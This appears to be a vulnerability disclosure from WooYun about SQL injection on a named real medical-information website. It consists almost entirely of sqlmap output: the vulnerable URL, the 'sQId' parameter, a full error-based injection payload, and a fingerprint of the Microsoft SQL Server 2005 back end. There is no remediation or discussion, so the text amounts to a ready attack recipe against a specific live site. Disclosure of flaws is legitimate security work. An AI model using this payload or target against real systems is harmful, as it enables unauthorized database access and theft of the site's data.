WooYun.org

http://med.39.net:80/Information/DailyTip.aspx?qId=2342&v=135791&t=0&sQId=1418

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: sQId (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: qId=2342&v=135791&t=0&sQId=1418 AND 8993=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8993=8993) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(112)+CHAR(113)))
---
[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2005